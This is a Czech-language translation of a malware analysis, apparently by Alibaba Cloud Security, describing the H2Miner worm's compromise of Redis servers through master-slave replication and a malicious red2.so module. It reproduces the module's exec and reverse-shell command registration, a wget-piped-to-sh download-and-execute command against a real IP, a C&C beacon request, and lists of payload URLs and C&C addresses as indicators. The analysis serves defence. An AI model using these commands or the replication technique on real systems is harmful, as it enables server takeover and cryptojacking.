Před dnem byl jeden ze serverů mého projektu napaden podobným červem. Při hledání odpovědi na otázku "co to bylo?" Našel jsem skvělý článek týmu Alibaba Cloud Security. Protože jsem tento článek na Habrého nenašel, rozhodl jsem se ho přeložit speciálně pro vás <3
Vstup
Nedávno bezpečnostní tým Alibaba Cloud objevil náhlé propuknutí H2Miner. Tento typ škodlivého červa využívá chybějící autorizaci nebo slabá hesla pro Redis jako brány do vašich systémů, načež synchronizuje svůj vlastní škodlivý modul s podřízeným prostřednictvím synchronizace master-slave a nakonec stáhne tento škodlivý modul do napadeného počítače a spustí škodlivý modul. instrukce.
V minulosti byly útoky na vaše systémy primárně prováděny pomocí metody zahrnující naplánované úlohy nebo klíče SSH, které byly zapsány do vašeho počítače poté, co se útočník přihlásil do Redis. Naštěstí tuto metodu nelze často používat kvůli problémům s kontrolou oprávnění nebo kvůli různým verzím systému. Tento způsob načítání škodlivého modulu však může přímo vykonat příkazy útočníka nebo získat přístup k shellu, což je pro váš systém nebezpečné.
Vzhledem k velkému počtu serverů Redis hostovaných na internetu (téměř 1 milion) bezpečnostní tým Alibaba Cloud jako přátelské připomenutí doporučuje, aby uživatelé nesdíleli Redis online a pravidelně kontrolovali sílu svých hesel a zda nejsou kompromitována. rychlý výběr.
H2Miner
H2Miner je těžební botnet pro systémy založené na Linuxu, který může napadnout váš systém různými způsoby, včetně nedostatku autorizace v chybách zabezpečení Hadoop yarn, Docker a Redis Remote Command Execution (RCE). Botnet funguje tak, že stahuje škodlivé skripty a malware za účelem těžby vašich dat, horizontálního rozšíření útoku a udržování komunikace velení a řízení (C&C).
Redis RCE
Znalosti na toto téma sdílel Pavel Toporkov na ZeroNights 2018. Po verzi 4.0 podporuje Redis funkci načítání zásuvných modulů, která uživatelům umožňuje načítat soubory zkompilované pomocí C do Redis, aby spustili specifické příkazy Redis. Tato funkce, i když je užitečná, obsahuje zranitelnost, ve které lze v režimu master-slave synchronizovat soubory s slave prostřednictvím režimu fullresync. Toho může útočník využít k přenosu škodlivých souborů so. Po dokončení přenosu útočníci načtou modul do napadené instance Redis a provedou libovolný příkaz.
Analýza malwarových červů
Bezpečnostní tým Alibaba Cloud nedávno zjistil, že velikost skupiny škodlivých těžařů H2Miner se náhle dramaticky zvýšila. Podle analýzy je obecný proces výskytu útoku následující:
H2Miner využívá RCE Redis pro plnohodnotný útok. Útočníci nejprve zaútočí na nechráněné servery Redis nebo servery se slabými hesly.
Poté použijí příkaz config set dbfilename red2.so pro změnu názvu souboru. Poté útočníci provedou příkaz slaveof pro nastavení adresy hostitele replikace master-slave.
Když napadená instance Redis naváže spojení master-slave se škodlivým Redis, který je ve vlastnictví útočníka, útočník odešle infikovaný modul pomocí příkazu fullresync k synchronizaci souborů. Soubor red2.so bude poté stažen do napadeného počítače. Útočníci pak použijí zaváděcí modul ./red2.so k načtení tohoto so souboru. Modul může provádět příkazy od útočníka nebo iniciovat zpětné připojení (backdoor), aby získal přístup k napadenému stroji.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Po provedení škodlivého příkazu, jako je např / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, útočník resetuje název záložního souboru a uvolní systémový modul, aby vyčistil stopy. Soubor red2.so však stále zůstane na napadeném počítači. Uživatelům se doporučuje věnovat pozornost přítomnosti takového podezřelého souboru ve složce jejich instance Redis.
Kromě zabití některých škodlivých procesů za účelem krádeže zdrojů útočník následoval škodlivý skript stahováním a spouštěním škodlivých binárních souborů do . To znamená, že název procesu nebo název adresáře obsahujícího kinsing na hostiteli může znamenat, že tento počítač byl infikován tímto virem.
Podle výsledků reverzního inženýrství plní malware především následující funkce:
- Nahrávání souborů a jejich spouštění
- hornictví
- Udržování komunikace C&C a provádění příkazů útočníka
Použijte masscan pro externí skenování, abyste rozšířili svůj vliv. Kromě toho je v programu pevně zakódována IP adresa serveru C&C a napadený hostitel bude komunikovat s komunikačním serverem C&C pomocí požadavků HTTP, kde jsou informace o zombie (kompromitovaném serveru) identifikovány v hlavičce HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Jiné způsoby útoku
Adresy a odkazy používané červem
/příbuzenství
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Rada
Za prvé, Redis by neměl být přístupný z internetu a měl by být chráněn silným heslem. Je také důležité, aby klienti zkontrolovali, že v adresáři Redis není žádný soubor red2.so a že v názvu souboru/procesu na hostiteli není „kinsing“.
Zdroj: www.habr.com